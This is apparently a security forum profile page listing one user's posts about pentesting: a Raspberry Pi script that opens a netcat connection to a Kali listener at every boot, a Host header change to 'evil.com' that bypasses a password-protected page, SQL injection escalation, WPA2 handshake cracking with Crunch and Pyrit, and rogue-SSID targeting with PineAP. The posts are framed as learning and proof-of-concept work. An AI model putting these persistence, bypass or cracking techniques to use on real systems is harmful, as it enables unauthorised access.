Jump to content

bolus

Active Members
  • Posts

    55
  • Joined

  • Last visited

Recent Profile Visitors

1,642 profile views

bolus's Achievements

Newbie

Newbie (1/14)

  1. @i8igmac- you've cracked it! Added the sleep command and it's working a treat now. thank you for your assistance and suggestions, really appreciate it
  2. Thanks for the quick suggestion @i8igmac - appreciate it. Unfortunately, that's not worked. I've edited /etc/rc.local and added netcat 192.168.1.215 443 -w 10 On reboot - nothing. If I run the command stand alone, it connects fine, so I've ruled out a connectivity issue there. Could it be anything to do with the user that the pi boots with? I've tried adding sudo in front of the netcat command - nothing. any suggestions from you guys is appreciated
  3. I'm trying a proof of concept whereby when my Pi starts, it kicks off a Netcat session with my Kali laptop. Setup: Kali laptop (192.168.1.215): netcat -lvp 443 Pi (192.168.1.217): I have the script boot_netcat.sh (and ran chmod +x on it): !#/bin/bash netcat 192.168.1.215 443 -w 10 In crontab I have added: @reboot /home/pi/scripts/boot_netcat.sh When I reboot the Pi, the script isn't run. I've tried adding sudo to the script and also the crontab entry - still no joy. I've also tried this by ensuring cron is run at boot via /etc/rc.local: /etc/init.d/cron/start And still nothing. If I run ps aux |grep cron I can see cron running. If I run the script on its own, it executes and connects to my Kali laptop netcat listener. I'm sure it's something very simple that I'm not doing or not seeing - any suggestions as to what the problem is, or is there a better way to do this? Thanks in advance
  4. Thanks @digininja, appreciate the quick response. confirms one of my theories
  5. I've got a page where the content access is restricted by a username/password combination. It's not credentials where the user has to register for, it's just set on the server where all content is publicly accessible, apart from this page. I've found that I can access this by changing the header host value (via burp) Original: GET /content HTTP/1.1 host: site.com which returns HTTP 401 authorization required I change the header details to: GET /content HTTP/1.1 host: evil.com then I can access the requested page. I kinda stumbled across this, and would like to learn more about it - any advice as to what this type of vulnerability is called, and why it happens? I *think* that it's happening due to the validation only working when the request comes from the host domain, but would like confirmation of this. Cheers
  6. Any tools you can recommend for looking at a website/application to deduce the software and versions that have been used? I don't mean like an nmap scan to identify services, but the software and services that are used when you're browsing the site. Thinking along the lines of builtwith.com, and something that goes a little deeper thanks in advance
  7. Thanks both for your feedback, very interesting and useful
  8. When you're running the OSINT and passive part of your engagement, what's the typical order of tools that you tend to run through? Dig, Fierce, DNS Recon Google hacks, Shodan, netcraft, built with Harvester Recon-ng, OSINT Framework Nikto Skipfish HTTrack, Burpsuite etc. etc. How do you structure your part of a pen test?
  9. You need to get even closer.
  10. I've not watched this yet; what did they mess up? was it intentional so that viewers have to find out for themselves, or was it an oversight?
  11. I'm learning my way through SQLi, and wondered what typically, the next steps are after I've: 1. Identified a vulnerability 2. via SQLi I've listed DB, user, tables, columns, content of columns etc 3. identified that user is not sysadmin (on a MySQL system) Where does one typically go next with identifying further information, and ultimately escalating privileges? I'm not after a step by step hold my hand approach, more a general 'this is the order I tend to do things in', as I know everyone has a different approach. thanks in advance
  12. Probably one of these: https://aws.amazon.com/ec2/instance-types/(Scroll down for GPU G2). TBH I've only just started looking into this, and I was fortunate enough to receive a $50 AWS voucher, so thought I'd have a play around with GPU pyrit. Model GPUs vCPU Mem (GiB) SSD Storage (GB) g2.2xlarge 1 8 15 1 x 60 g2.8xlarge 4 32 60 2 x 120
  13. Sorry, I worded my question rather vaguely. I have not a lot at home in terms of processing power, so am thinking that AWS GPU solution might be the way to go. thanks for your quick response
  14. Hi all. I've got a WPA2 handshake to crack, I know the format is 8 upper case A-Z and 0-9. I was thinking of using an AWS GPU instance to pipe Crunch output into Pyrit GPU, as I don't have masses of storage space to save the output. Does this sound like a feasible option, or can you think of a better way? Cheers
  15. If you've got time to prepare whilst other presentations are on, why not run a recon as close to the clients as you can get, and try to identify their devices. Then you can log probes that their devices are making, and set up PineAP with some of their SSIDs, and omit any other probes - that way you keep it targeted to the client and show them that they can be singled out pretty easily. Might be worth finding out if there are any legal issues with this before you embark
×
×
  • Create New...